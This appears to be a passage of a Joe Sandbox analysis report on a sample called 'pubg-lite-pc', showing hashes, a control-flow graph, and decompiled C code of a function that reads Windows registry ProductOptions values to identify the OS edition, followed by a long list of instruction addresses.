                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                • String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT
                                                                                                • API String ID: 1586453840-3149529848
                                                                                                • Opcode ID: 8a87e77424d7609e87150482c5607db342ce456295d4a8fa596b89c9f3926a73
                                                                                                • Instruction ID: 43414bd87b41f9a11ec0c34037fab694fc8bd646bb4ffcfd7936d54330adfba2
                                                                                                • Opcode Fuzzy Hash: 8a87e77424d7609e87150482c5607db342ce456295d4a8fa596b89c9f3926a73
                                                                                                • Instruction Fuzzy Hash: 5971D730700388CBDB21DB26CD847BA72ADEB61704F104575E906D76E2EF78ED458B56
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D9811E0 Relevance: 37.1, APIs: 4, Strings: 17, Instructions: 386registryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 85 6d9811e0-6d981254 RegOpenKeyExW 87 6d98125a-6d981282 RegQueryValueExW 85->87 88 6d9816ce-6d9816e1 85->88 89 6d981288-6d98128d 87->89 90 6d98130c-6d98132b RegQueryValueExW 87->90 91 6d9816f1-6d981713 call 6d98a13f 88->91 92 6d9816e3-6d9816ea RegCloseKey 88->92 94 6d981290-6d9812a5 89->94 90->88 93 6d981331-6d981342 90->93 92->91 96 6d981351-6d981353 93->96 97 6d981344-6d98134c 93->97 98 6d9812c2-6d9812c7 94->98 99 6d9812a7 94->99 96->88 103 6d981359-6d98136b 96->103 97->97 101 6d98134e 97->101 104 6d9812d0-6d9812e5 98->104 99->98 102 6d9812a9-6d9812ac 99->102 101->96 107 6d9812ae-6d9812b1 102->107 108 6d9812b3-6d9812c0 102->108 109 6d981370-6d98137a 103->109 105 6d9812fa 104->105 106 6d9812e7 104->106 111 6d9812ff-6d981305 105->111 106->105 110 6d9812e9-6d9812ec 106->110 107->94 107->108 112 6d981307 108->112 113 6d981380-6d98138e 109->113 114 6d9812ee-6d9812f1 110->114 115 6d9812f3-6d9812f8 110->115 111->112 112->90 116 6d9813ac-6d9813bc 113->116 117 6d981390 113->117 114->104 114->115 115->111 119 6d9813c0-6d9813ce 116->119 117->116 118 6d981392-6d981395 117->118 120 6d98139c-6d9813a7 118->120 121 6d981397-6d98139a 118->121 122 6d9813ec-6d9813fc 119->122 123 6d9813d0 119->123 124 6d98169e-6d9816b4 120->124 121->113 121->120 126 6d981400-6d98140e 122->126 123->122 125 6d9813d2-6d9813d5 123->125 127 6d9816c3-6d9816c8 124->127 128 6d9816b6-6d9816be 124->128 129 6d9813dc-6d9813e7 125->129 130 6d9813d7-6d9813da 125->130 131 6d98142c-6d98143c 126->131 132 6d981410 126->132 127->88 127->109 128->128 134 6d9816c0 128->134 129->124 130->119 130->129 133 6d981440-6d98144e 131->133 132->131 135 6d981412-6d981415 132->135 136 6d98146c-6d98147c 133->136 137 6d981450 133->137 134->127 138 6d98141c-6d981427 135->138 139 6d981417-6d98141a 135->139 141 6d981480-6d98148e 136->141 137->136 140 6d981452-6d981455 137->140 138->124 139->126 139->138 142 6d98145c-6d981467 140->142 143 6d981457-6d98145a 140->143 144 6d9814ac-6d9814bc 141->144 145 6d981490 141->145 142->124 143->133 143->142 147 6d9814c0-6d9814ce 144->147 145->144 146 6d981492-6d981495 145->146 148 6d98149c-6d9814a7 146->148 149 6d981497-6d98149a 146->149 150 6d9814ec-6d9814fc 147->150 151 6d9814d0 147->151 148->124 149->141 149->148 152 6d981500-6d98150e 150->152 151->150 153 6d9814d2-6d9814d5 151->153 154 6d98152c-6d98153c 152->154 155 6d981510 152->155 156 6d9814dc-6d9814e7 153->156 157 6d9814d7-6d9814da 153->157 159 6d981540-6d98154e 154->159 155->154 158 6d981512-6d981515 155->158 156->124 157->147 157->156 160 6d98151c-6d981527 158->160 161 6d981517-6d98151a 158->161 162 6d981570-6d98157d 159->162 163 6d981550 159->163 160->124 161->152 161->160 165 6d981580-6d98158e 162->165 163->162 164 6d981552-6d981555 163->164 166 6d98155c-6d98156b 164->166 167 6d981557-6d98155a 164->167 168 6d981590 165->168 169 6d9815a6-6d9815ad 165->169 166->124 167->159 167->166 168->169 170 6d981592-6d981595 168->170 171 6d9815b0-6d9815be 169->171 172 6d98159c-6d9815a1 170->172 173 6d981597-6d98159a 170->173 174 6d9815c0 171->174 175 6d9815d6-6d9815dd 171->175 176 6d981691-6d981694 172->176 173->165 173->172 174->175 177 6d9815c2-6d9815c5 174->177 178 6d9815e0-6d9815ee 175->178 179 6d98169b 176->179 180 6d9815cc-6d9815d1 177->180 181 6d9815c7-6d9815ca 177->181 182 6d9815f0 178->182 183 6d981606-6d98160d 178->183 179->124 180->176 181->171 181->180 182->183 185 6d9815f2-6d9815f5 182->185 184 6d981610-6d98161e 183->184 186 6d981620 184->186 187 6d981633-6d98163d 184->187 188 6d9815fc-6d981601 185->188 189 6d9815f7-6d9815fa 185->189 186->187 190 6d981622-6d981625 186->190 191 6d981640-6d98164e 187->191 188->176 189->178 189->188 192 6d98162c-6d981631 190->192 193 6d981627-6d98162a 190->193 194 6d981650 191->194 195 6d981663-6d98166b 191->195 192->176 193->184 193->192 194->195 196 6d981652-6d981655 194->196 197 6d981670-6d98167e 195->197 198 6d98165c-6d981661 196->198 199 6d981657-6d98165a 196->199 197->179 200 6d981680 197->200 198->176 199->191 199->198 200->179 201 6d981682-6d981685 200->201 202 6d98168c 201->202 203 6d981687-6d98168a 201->203 202->176 203->197 203->202
                                                                                                C-Code - Quality: 93%
                                                                                                			E6D9811E0(void* __ebx, void* __edi, void* __esi) {
				signed int _t96;
				char _t97;
				long _t102;
				void* _t103;
				long _t108;
				long _t111;
				char* _t112;
				signed short* _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				char* _t130;
				signed short _t131;
				void* _t133;
				void* _t134;
				short _t135;
				char _t136;
				signed short _t140;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed short* _t164;
				signed short* _t166;
				signed short* _t168;
				signed short* _t170;
				signed short* _t172;
				signed short* _t174;
				signed short* _t176;
				signed short* _t178;
				signed short* _t179;
				signed short* _t180;
				signed short* _t181;
				signed short* _t182;
				signed short* _t183;
				signed short _t185;
				signed int _t186;
				signed int _t187;
				char* _t190;
				signed short* _t191;
				void* _t197;
				signed short _t199;
				signed short _t201;
				signed short _t203;
				signed short _t205;
				signed short _t207;
				signed short _t209;
				signed short _t211;
				signed short _t213;
				signed short _t215;
				signed short _t217;
				signed short _t219;
				signed short _t221;
				char* _t222;
				void* _t223;
				void* _t229;
				void* _t237;

				_t222 = _t223 - 0xa0c;
				_t96 =  *0x6d9e5024; // 0xe85bfa76
				_t97 = _t96 ^ _t222;
				_t222[0xa08] = _t97;
				 *[fs:0x0] = _t222 - 0xc;
				 *((intOrPtr*)(_t222 - 0x1c)) = 0x6d9d1fd4;
				 *(_t222 - 0x18) = 0;
				 *(_t222 - 4) = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t222 - 0x1c)) + 4))(_t97, __edi, __esi, __ebx,  *[fs:0x0], E6D9B8DBD, 0xffffffff);
				_t102 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\ProductOptions", 0, 0x20119, _t222 - 0x18); // executed
				if(_t102 >= 0) {
					 *(_t222 - 0x20) = 0x208;
					_t108 = RegQueryValueExW( *(_t222 - 0x18), L"ProductType", 0, 0,  &(_t222[0x800]), _t222 - 0x20); // executed
					if(_t108 == 0) {
						_t133 = 0xfffffffe;
						while(1) {
							_t133 = _t133 + 2;
							_t162 =  *(_t133 + L"WinNT") & 0x0000ffff;
							_t186 = _t222[_t133 + 0x800] & 0x0000ffff;
							_t229 = _t186 - _t162;
							if(_t229 < 0 || _t229 > 0) {
								break;
							}
							if(_t186 == 0 || _t162 == 0) {
								 *0x6d9f0148 = 1;
								_t136 = 0;
							} else {
								continue;
							}
							L16:
							 *0x6d9f014c = _t136;
							goto L17;
						}
						_t134 = 0xfffffffe;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t134 = _t134 + 2;
							_t163 =  *(_t134 + L"ServerNT") & 0x0000ffff;
							_t187 = _t222[_t134 + 0x800] & 0x0000ffff;
							__eflags = _t187 - _t163;
							if(__eflags < 0 || __eflags > 0) {
								break;
							}
							__eflags = _t187;
							if(_t187 == 0) {
								L13:
								_t135 = 3;
							} else {
								__eflags = _t163;
								if(_t163 != 0) {
									continue;
								} else {
									goto L13;
								}
							}
							L15:
							 *0x6d9f0148 = _t135;
							_t136 = 1;
							goto L16;
						}
						_t135 = 2;
						goto L15;
					}
					L17:
					 *(_t222 - 0x24) = 0x800;
					_t111 = RegQueryValueExW( *(_t222 - 0x18), L"ProductSuite", 0, 0, _t222, _t222 - 0x24); // executed
					if(_t111 == 0) {
						_t146 = 0;
						_t190 = _t222;
						_t112 = _t190;
						 *(_t222 - 0x10) = _t190;
						 *(_t222 - 0x14) = 0;
						if( *_t222 != 0) {
							do {
								_t112 =  &(_t112[2]);
								_t146 = _t146 + 1;
							} while ( *_t112 != 0);
							 *(_t222 - 0x14) = _t146;
						}
						if(_t146 != 0) {
							_t140 =  *0x6d9f014a;
							_t114 = L"Small Business" - 2;
							 *(_t222 - 0x28) = _t114;
							do {
								_t164 = _t114;
								_t197 = _t190 - L"Small Business";
								asm("o16 nop [eax+eax]");
								while(1) {
									_t115 =  *(_t197 +  &(_t164[1])) & 0x0000ffff;
									_t164 =  &(_t164[1]);
									_t147 =  *_t164 & 0x0000ffff;
									_t237 = _t115 - _t147;
									if(_t237 < 0 || _t237 > 0) {
										break;
									}
									if(_t115 == 0 || _t147 == 0) {
										_t140 = _t140 | 0x00000001;
										 *0x6d9f014a = _t140;
									} else {
										continue;
									}
									L109:
									_t161 = 0;
									 *(_t222 - 0x14) = 0;
									_t190 = _t190 +  *(_t222 - 0x14) * 2 + 2;
									 *(_t222 - 0x10) = _t190;
									_t130 = _t190;
									if( *_t190 != 0) {
										do {
											_t130 =  &(_t130[2]);
											_t161 = _t161 + 1;
										} while ( *_t130 != 0);
										 *(_t222 - 0x14) = _t161;
									}
									goto L112;
								}
								_t166 = L"Enterprise" - 2;
								_t199 = _t190 - L"Enterprise";
								__eflags = _t199;
								while(1) {
									_t116 =  *( &(_t166[1]) + _t199) & 0x0000ffff;
									_t166 =  &(_t166[1]);
									_t148 =  *_t166 & 0x0000ffff;
									__eflags = _t116 - _t148;
									if(__eflags < 0 || __eflags > 0) {
										break;
									}
									__eflags = _t116;
									if(_t116 == 0) {
										L34:
										_t140 = _t140 | 0x00000002;
										 *0x6d9f014a = _t140;
									} else {
										__eflags = _t148;
										if(_t148 != 0) {
											continue;
										} else {
											goto L34;
										}
									}
									goto L109;
								}
								_t168 = L"BackOffice" - 2;
								_t201 = _t190 - L"BackOffice";
								__eflags = _t201;
								while(1) {
									_t117 =  *( &(_t168[1]) + _t201) & 0x0000ffff;
									_t168 =  &(_t168[1]);
									_t149 =  *_t168 & 0x0000ffff;
									__eflags = _t117 - _t149;
									if(__eflags < 0 || __eflags > 0) {
										break;
									}
									__eflags = _t117;
									if(_t117 == 0) {
										L40:
										_t140 = _t140 | 0x00000004;
										 *0x6d9f014a = _t140;
									} else {
										__eflags = _t149;
										if(_t149 != 0) {
											continue;
										} else {
											goto L40;
										}
									}
									goto L109;
								}
								_t170 = L"CommunicationServer" - 2;
								_t203 = _t190 - L"CommunicationServer";
								__eflags = _t203;
								while(1) {
									_t118 =  *( &(_t170[1]) + _t203) & 0x0000ffff;
									_t170 =  &(_t170[1]);
									_t150 =  *_t170 & 0x0000ffff;
									__eflags = _t118 - _t150;
									if(__eflags < 0 || __eflags > 0) {
										break;
									}
									__eflags = _t118;
									if(_t118 == 0) {
										L46:
										_t140 = _t140 | 0x00000008;
										 *0x6d9f014a = _t140;
									} else {
										__eflags = _t150;
										if(_t150 != 0) {
											continue;
										} else {
											goto L46;
										}
									}
									goto L109;
								}
								_t172 = L"Terminal Server" - 2;
								_t205 = _t190 - L"Terminal Server";
								__eflags = _t205;
								while(1) {
									_t119 =  *( &(_t172[1]) + _t205) & 0x0000ffff;
									_t172 =  &(_t172[1]);
									_t151 =  *_t172 & 0x0000ffff;
									__eflags = _t119 - _t151;
									if(__eflags < 0 || __eflags > 0) {
										break;
									}
									__eflags = _t119;
									if(_t119 == 0) {
										L52:
										_t140 = _t140 | 0x00000010;
										 *0x6d9f014a = _t140;
									} else {
										__eflags = _t151;
										if(_t151 != 0) {
											continue;
										} else {
											goto L52;
										}
									}
									goto L109;
								}
								_t174 = L"Small Business(Restricted)" - 2;
								_t207 = _t190 - L"Small Business(Restricted)";
								__eflags = _t207;
								while(1) {
									_t120 =  *( &(_t174[1]) + _t207) & 0x0000ffff;
									_t174 =  &(_t174[1]);
									_t152 =  *_t174 & 0x0000ffff;
									__eflags = _t120 - _t152;
									if(__eflags < 0 || __eflags > 0) {
										break;
									}
									__eflags = _t120;
									if(_t120 == 0) {
										L58:
										_t140 = _t140 | 0x00000020;
										 *0x6d9f014a = _t140;
									} else {
										__eflags = _t152;
										if(_t152 != 0) {
											continue;
										} else {
											goto L58;
										}
									}
									goto L109;
								}
								_t176 = L"EmbeddedNT" - 2;
								_t209 = _t190 - L"EmbeddedNT";
								__eflags = _t209;
								while(1) {
									_t121 =  *( &(_t176[1]) + _t209) & 0x0000ffff;
									_t176 =  &(_t176[1]);
									_t153 =  *_t176 & 0x0000ffff;
									__eflags = _t121 - _t153;
									if(__eflags < 0 || __eflags > 0) {
										break;
									}
									__eflags = _t121;
									if(_t121 == 0) {
										L64:
										_t140 = _t140 | 0x00000040;
										 *0x6d9f014a = _t140;
									} else {
										__eflags = _t153;
										if(_t153 != 0) {
											continue;
										} else {
											goto L64;
										}
									}
									goto L109;
								}
								_t178 = L"DataCenter" - 2;
								_t211 = _t190 - L"DataCenter";
								__eflags = _t211;
								while(1) {
									_t122 =  *( &(_t178[1]) + _t211) & 0x0000ffff;
									_t178 =  &(_t178[1]);
									_t154 =  *_t178 & 0x0000ffff;
									__eflags = _t122 - _t154;
									if(__eflags < 0 || __eflags > 0) {
										break;
									}
									__eflags = _t122;
									if(_t122 == 0) {
										L70:
										_t140 = _t140 | 0x00000080;
										 *0x6d9f014a = _t140;
									} else {
										__eflags = _t154;
										if(_t154 != 0) {
											continue;
										} else {
											goto L70;
										}
									}
									goto L109;
								}
								_t191 =  &(_t190[0xfffffffffffffffe]);
								_t213 = L"Personal" -  *(_t222 - 0x10);
								__eflags = _t213;
								_t179 = _t191;
								while(1) {
									_t155 =  *( &(_t179[1]) + _t213) & 0x0000ffff;
									_t179 =  &(_t179[1]);
									_t123 =  *_t179 & 0x0000ffff;
									__eflags = _t123 - _t155;
									if(__eflags < 0 || __eflags > 0) {
										break;
									}
									__eflags = _t123;
									if(_t123 == 0) {
										L76:
										_t131 = 0x200;
										L107:
										_t140 = _t140 | _t131;
										__eflags = _t140;
										 *0x6d9f014a = _t140;
									} else {
										__eflags = _t155;
										if(_t155 != 0) {
											continue;
										} else {
											goto L76;
										}
									}
									L108:
									_t190 =  *(_t222 - 0x10);
									goto L109;
								}
								_t180 = _t191;
								_t215 = L"Blade" -  *(_t222 - 0x10);
								__eflags = _t215;
								while(1) {
									_t156 =  *( &(_t180[1]) + _t215) & 0x0000ffff;
									_t180 =  &(_t180[1]);
									_t124 =  *_t180 & 0x0000ffff;
									__eflags = _t124 - _t156;
									if(__eflags < 0 || __eflags > 0) {
										break;
									}
									__eflags = _t124;
									if(_t124 == 0) {
										L82:
										_t131 = 0x400;
										goto L107;
									} else {
										__eflags = _t156;
										if(_t156 != 0) {
											continue;
										} else {
											goto L82;
										}
									}
									goto L108;
								}
								_t181 = _t191;
								_t217 = L"Embedded(Restricted)" -  *(_t222 - 0x10);
								__eflags = _t217;
								while(1) {
									_t157 =  *( &(_t181[1]) + _t217) & 0x0000ffff;
									_t181 =  &(_t181[1]);
									_t125 =  *_t181 & 0x0000ffff;
									__eflags = _t125 - _t157;
									if(__eflags < 0 || __eflags > 0) {
										break;
									}
									__eflags = _t125;
									if(_t125 == 0) {
										L88:
										_t131 = 0x800;
										goto L107;
									} else {
										__eflags = _t157;
										if(_t157 != 0) {
											continue;
										} else {
											goto L88;
										}
									}
									goto L108;
								}
								_t182 = _t191;
								_t219 = L"Security Appliance" -  *(_t222 - 0x10);
								__eflags = _t219;
								while(1) {
									_t158 =  *( &(_t182[1]) + _t219) & 0x0000ffff;
									_t182 =  &(_t182[1]);
									_t126 =  *_t182 & 0x0000ffff;
									__eflags = _t126 - _t158;
									if(__eflags < 0 || __eflags > 0) {
										break;
									}
									__eflags = _t126;
									if(_t126 == 0) {
										L94:
										_t131 = 0x1000;
										goto L107;
									} else {
										__eflags = _t158;
										if(_t158 != 0) {
											continue;
										} else {
											goto L94;
										}
									}
									goto L108;
								}
								_t183 = _t191;
								_t221 = L"Storage Server" -  *(_t222 - 0x10);
								__eflags = _t221;
								while(1) {
									_t159 =  *( &(_t183[1]) + _t221) & 0x0000ffff;
									_t183 =  &(_t183[1]);
									_t127 =  *_t183 & 0x0000ffff;
									__eflags = _t127 - _t159;
									if(__eflags < 0 || __eflags > 0) {
										break;
									}
									__eflags = _t127;
									if(_t127 == 0) {
										L100:
										_t131 = 0x2000;
										goto L107;
									} else {
										__eflags = _t159;
										if(_t159 != 0) {
											continue;
										} else {
											goto L100;
										}
									}
									goto L108;
								}
								_t185 = L"Compute Server" -  *(_t222 - 0x10);
								__eflags = _t185;
								while(1) {
									_t160 =  *( &(_t191[1]) + _t185) & 0x0000ffff;
									_t191 =  &(_t191[1]);
									_t128 =  *_t191 & 0x0000ffff;
									__eflags = _t128 - _t160;
									if(__eflags < 0 || __eflags > 0) {
										goto L108;
									}
									__eflags = _t128;
									if(_t128 == 0) {
										L106:
										_t131 = 0x4000;
										goto L107;
									} else {
										__eflags = _t160;
										if(_t160 != 0) {
											continue;
										} else {
											goto L106;
										}
									}
									goto L108;
								}
								goto L108;
								L112:
								_t114 =  *(_t222 - 0x28);
							} while (_t161 != 0);
						}
					}
				}
				 *(_t222 - 4) = 0xffffffff;
				_t103 =  *(_t222 - 0x18);
				 *((intOrPtr*)(_t222 - 0x1c)) = 0x6d9d1fd4;
				if(_t103 != 0) {
					RegCloseKey(_t103);
					 *(_t222 - 0x18) = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t222 - 0xc));
				return L6D98A13F(_t222[0xa08] ^ _t222);
			}





















































































                                                                                                0x6d9811e1
                                                                                                0x6d9811ff
                                                                                                0x6d981204
                                                                                                0x6d981206
                                                                                                0x6d981213
                                                                                                0x6d981219
                                                                                                0x6d981220
                                                                                                0x6d981227
                                                                                                0x6d981234
                                                                                                0x6d98124c
                                                                                                0x6d981254
                                                                                                0x6d98126a
                                                                                                0x6d98127e
                                                                                                0x6d981282
                                                                                                0x6d981288
                                                                                                0x6d981290
                                                                                                0x6d981290
                                                                                                0x6d981293
                                                                                                0x6d98129a
                                                                                                0x6d9812a2
                                                                                                0x6d9812a5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9812ac
                                                                                                0x6d9812b8
                                                                                                0x6d9812be
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d981307
                                                                                                0x6d981307
                                                                                                0x00000000
                                                                                                0x6d981307
                                                                                                0x6d9812c2
                                                                                                0x6d9812c7
                                                                                                0x6d9812d0
                                                                                                0x6d9812d0
                                                                                                0x6d9812d3
                                                                                                0x6d9812da
                                                                                                0x6d9812e2
                                                                                                0x6d9812e5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9812e9
                                                                                                0x6d9812ec
                                                                                                0x6d9812f3
                                                                                                0x6d9812f3
                                                                                                0x6d9812ee
                                                                                                0x6d9812ee
                                                                                                0x6d9812f1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9812f1
                                                                                                0x6d9812ff
                                                                                                0x6d9812ff
                                                                                                0x6d981305
                                                                                                0x00000000
                                                                                                0x6d981305
                                                                                                0x6d9812fa
                                                                                                0x00000000
                                                                                                0x6d9812fa
                                                                                                0x6d98130c
                                                                                                0x6d98130f
                                                                                                0x6d981327
                                                                                                0x6d98132b
                                                                                                0x6d981331
                                                                                                0x6d981333
                                                                                                0x6d981336
                                                                                                0x6d981338
                                                                                                0x6d98133b
                                                                                                0x6d981342
                                                                                                0x6d981344
                                                                                                0x6d981344
                                                                                                0x6d981347
                                                                                                0x6d981348
                                                                                                0x6d98134e
                                                                                                0x6d98134e
                                                                                                0x6d981353
                                                                                                0x6d981359
                                                                                                0x6d981365
                                                                                                0x6d981368
                                                                                                0x6d981370
                                                                                                0x6d981372
                                                                                                0x6d981374
                                                                                                0x6d98137a
                                                                                                0x6d981380
                                                                                                0x6d981380
                                                                                                0x6d981385
                                                                                                0x6d981388
                                                                                                0x6d98138b
                                                                                                0x6d98138e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d981395
                                                                                                0x6d98139c
                                                                                                0x6d9813a0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d98169e
                                                                                                0x6d9816a1
                                                                                                0x6d9816a3
                                                                                                0x6d9816a9
                                                                                                0x6d9816ac
                                                                                                0x6d9816af
                                                                                                0x6d9816b4
                                                                                                0x6d9816b6
                                                                                                0x6d9816b6
                                                                                                0x6d9816b9
                                                                                                0x6d9816ba
                                                                                                0x6d9816c0
                                                                                                0x6d9816c0
                                                                                                0x00000000
                                                                                                0x6d9816b4
                                                                                                0x6d9813b3
                                                                                                0x6d9813b6
                                                                                                0x6d9813b6
                                                                                                0x6d9813c0
                                                                                                0x6d9813c0
                                                                                                0x6d9813c5
                                                                                                0x6d9813c8
                                                                                                0x6d9813cb
                                                                                                0x6d9813ce
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9813d2
                                                                                                0x6d9813d5
                                                                                                0x6d9813dc
                                                                                                0x6d9813dc
                                                                                                0x6d9813e0
                                                                                                0x6d9813d7
                                                                                                0x6d9813d7
                                                                                                0x6d9813da
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9813da
                                                                                                0x00000000
                                                                                                0x6d9813d5
                                                                                                0x6d9813f3
                                                                                                0x6d9813f6
                                                                                                0x6d9813f6
                                                                                                0x6d981400
                                                                                                0x6d981400
                                                                                                0x6d981405
                                                                                                0x6d981408
                                                                                                0x6d98140b
                                                                                                0x6d98140e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d981412
                                                                                                0x6d981415
                                                                                                0x6d98141c
                                                                                                0x6d98141c
                                                                                                0x6d981420
                                                                                                0x6d981417
                                                                                                0x6d981417
                                                                                                0x6d98141a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d98141a
                                                                                                0x00000000
                                                                                                0x6d981415
                                                                                                0x6d981433
                                                                                                0x6d981436
                                                                                                0x6d981436
                                                                                                0x6d981440
                                                                                                0x6d981440
                                                                                                0x6d981445
                                                                                                0x6d981448
                                                                                                0x6d98144b
                                                                                                0x6d98144e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d981452
                                                                                                0x6d981455
                                                                                                0x6d98145c
                                                                                                0x6d98145c
                                                                                                0x6d981460
                                                                                                0x6d981457
                                                                                                0x6d981457
                                                                                                0x6d98145a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d98145a
                                                                                                0x00000000
                                                                                                0x6d981455
                                                                                                0x6d981473
                                                                                                0x6d981476
                                                                                                0x6d981476
                                                                                                0x6d981480
                                                                                                0x6d981480
                                                                                                0x6d981485
                                                                                                0x6d981488
                                                                                                0x6d98148b
                                                                                                0x6d98148e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d981492
                                                                                                0x6d981495
                                                                                                0x6d98149c
                                                                                                0x6d98149c
                                                                                                0x6d9814a0
                                                                                                0x6d981497
                                                                                                0x6d981497
                                                                                                0x6d98149a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d98149a
                                                                                                0x00000000
                                                                                                0x6d981495
                                                                                                0x6d9814b3
                                                                                                0x6d9814b6
                                                                                                0x6d9814b6
                                                                                                0x6d9814c0
                                                                                                0x6d9814c0
                                                                                                0x6d9814c5
                                                                                                0x6d9814c8
                                                                                                0x6d9814cb
                                                                                                0x6d9814ce
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9814d2
                                                                                                0x6d9814d5
                                                                                                0x6d9814dc
                                                                                                0x6d9814dc
                                                                                                0x6d9814e0
                                                                                                0x6d9814d7
                                                                                                0x6d9814d7
                                                                                                0x6d9814da
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9814da
                                                                                                0x00000000
                                                                                                0x6d9814d5
                                                                                                0x6d9814f3
                                                                                                0x6d9814f6
                                                                                                0x6d9814f6
                                                                                                0x6d981500
                                                                                                0x6d981500
                                                                                                0x6d981505
                                                                                                0x6d981508
                                                                                                0x6d98150b
                                                                                                0x6d98150e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d981512
                                                                                                0x6d981515
                                                                                                0x6d98151c
                                                                                                0x6d98151c
                                                                                                0x6d981520
                                                                                                0x6d981517
                                                                                                0x6d981517
                                                                                                0x6d98151a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d98151a
                                                                                                0x00000000
                                                                                                0x6d981515
                                                                                                0x6d981533
                                                                                                0x6d981536
                                                                                                0x6d981536
                                                                                                0x6d981540
                                                                                                0x6d981540
                                                                                                0x6d981545
                                                                                                0x6d981548
                                                                                                0x6d98154b
                                                                                                0x6d98154e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d981552
                                                                                                0x6d981555
                                                                                                0x6d98155c
                                                                                                0x6d981561
                                                                                                0x6d981564
                                                                                                0x6d981557
                                                                                                0x6d981557
                                                                                                0x6d98155a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d98155a
                                                                                                0x00000000
                                                                                                0x6d981555
                                                                                                0x6d981570
                                                                                                0x6d981578
                                                                                                0x6d981578
                                                                                                0x6d98157b
                                                                                                0x6d981580
                                                                                                0x6d981580
                                                                                                0x6d981585
                                                                                                0x6d981588
                                                                                                0x6d98158b
                                                                                                0x6d98158e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d981592
                                                                                                0x6d981595
                                                                                                0x6d98159c
                                                                                                0x6d98159c
                                                                                                0x6d981691
                                                                                                0x6d981691
                                                                                                0x6d981691
                                                                                                0x6d981694
                                                                                                0x6d981597
                                                                                                0x6d981597
                                                                                                0x6d98159a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d98159a
                                                                                                0x6d98169b
                                                                                                0x6d98169b
                                                                                                0x00000000
                                                                                                0x6d98169b
                                                                                                0x6d9815ab
                                                                                                0x6d9815ad
                                                                                                0x6d9815ad
                                                                                                0x6d9815b0
                                                                                                0x6d9815b0
                                                                                                0x6d9815b5
                                                                                                0x6d9815b8
                                                                                                0x6d9815bb
                                                                                                0x6d9815be
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9815c2
                                                                                                0x6d9815c5
                                                                                                0x6d9815cc
                                                                                                0x6d9815cc
                                                                                                0x00000000
                                                                                                0x6d9815c7
                                                                                                0x6d9815c7
                                                                                                0x6d9815ca
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9815ca
                                                                                                0x00000000
                                                                                                0x6d9815c5
                                                                                                0x6d9815db
                                                                                                0x6d9815dd
                                                                                                0x6d9815dd
                                                                                                0x6d9815e0
                                                                                                0x6d9815e0
                                                                                                0x6d9815e5
